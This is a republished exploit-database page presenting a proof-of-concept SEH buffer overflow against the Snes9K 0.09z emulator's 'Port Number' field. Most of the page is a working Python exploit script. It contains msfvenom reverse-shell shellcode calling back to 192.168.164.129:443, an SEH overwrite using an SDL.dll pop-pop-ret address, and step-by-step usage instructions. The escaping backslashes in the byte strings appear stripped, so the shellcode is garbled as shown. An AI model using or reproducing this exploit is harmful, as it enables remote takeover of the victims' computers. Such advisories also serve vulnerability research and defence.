Exploit/Advisories

Published on July 24th, 2020 📆 | 6358 Views ⚑

0

Snes9K 0.09z Local Buffer Overflow ≈ Packet Storm


iSpeech.org

# Exploit Title: Snes9K 0.09z - 'Port Number' Buffer Overflow (SEH)
# Date: 2020-07-20
# Exploit Author: MasterVlad
# Vendor Homepage: https://sourceforge.net/projects/snes9k/
# Software Link: https://www.exploit-db.com/apps/ef5249b64ce34575c12970b334a08c17-snes9k009z.zip
# Version: 0.09z
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 10 x64

# Proof of Concept:

# 1. Run the python script
# 2. Open exploit.txt and copy the content to clipboard
# 3. Open Snes9K 0.09z
# 4. Click on Netplay -> Connect to Server
# 5. Paste the clipboard into the "Port Number" field
# 6. Click on Connect and then on OK

#!/usr/bin/python

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "x00x0ax0d" -f py





buf = ""
buf += "xd9xc3xbfx7cxdcxedx95xd9x74x24xf4x58x29"
buf += "xc9xb1x52x31x78x17x83xc0x04x03x04xcfx0f"
buf += "x60x08x07x4dx8bxf0xd8x32x05x15xe9x72x71"
buf += "x5ex5ax43xf1x32x57x28x57xa6xecx5cx70xc9"
buf += "x45xeaxa6xe4x56x47x9ax67xd5x9axcfx47xe4"
buf += "x54x02x86x21x88xefxdaxfaxc6x42xcax8fx93"
buf += "x5ex61xc3x32xe7x96x94x35xc6x09xaex6fxc8"
buf += "xa8x63x04x41xb2x60x21x1bx49x52xddx9ax9b"
buf += "xaax1ex30xe2x02xedx48x23xa4x0ex3fx5dxd6"
buf += "xb3x38x9axa4x6fxccx38x0exfbx76xe4xaex28"
buf += "xe0x6fxbcx85x66x37xa1x18xaax4cxddx91x4d"
buf += "x82x57xe1x69x06x33xb1x10x1fx99x14x2cx7f"
buf += "x42xc8x88xf4x6fx1dxa1x57xf8xd2x88x67xf8"
buf += "x7cx9ax14xcax23x30xb2x66xabx9ex45x88x86"
buf += "x67xd9x77x29x98xf0xb3x7dxc8x6ax15xfex83"
buf += "x6ax9ax2bx03x3ax34x84xe4xeaxf4x74x8dxe0"
buf += "xfaxabxadx0bxd1xc3x44xf6xb2x2bx30x5cxc3"
buf += "xc4x43x9cxc5xafxcdx7axafxdfx9bxd5x58x79"
buf += "x86xadxf9x86x1cxc8x3ax0cx93x2dxf4xe5xde"
buf += "x3dx61x06x95x1fx24x19x03x37xaax88xc8xc7"
buf += "xa5xb0x46x90xe2x07x9fx74x1fx31x09x6axe2"
buf += "xa7x72x2ex39x14x7cxafxccx20x5axbfx08xa8"
buf += "xe6xebxc4xffxb0x45xa3xa9x72x3fx7dx05xdd"
buf += "xd7xf8x65xdexa1x04xa0xa8x4dxb4x1dxedx72"
buf += "x79xcaxf9x0bx67x6ax05xc6x23x9ax4cx4ax05"
buf += "x33x09x1fx17x5exaaxcax54x67x29xfex24x9c"
buf += "x31x8bx21xd8xf5x60x58x71x90x86xcfx72xb1"

exploit = "A"*420
exploit += "x74x06x75x04"
# 0x10015140 pop pop ret; SDL.dll
exploit += "x40x51x01x10"
exploit += "x41"*(2000-428-len(buf))
exploit += buf

f = open("exploit.txt", "w")
f.write(exploit)
f.close()

Source link

Tagged with:



Comments are closed.






© Torchsec  Privacy Policy Disclaimer  T&C



Back to Top ↑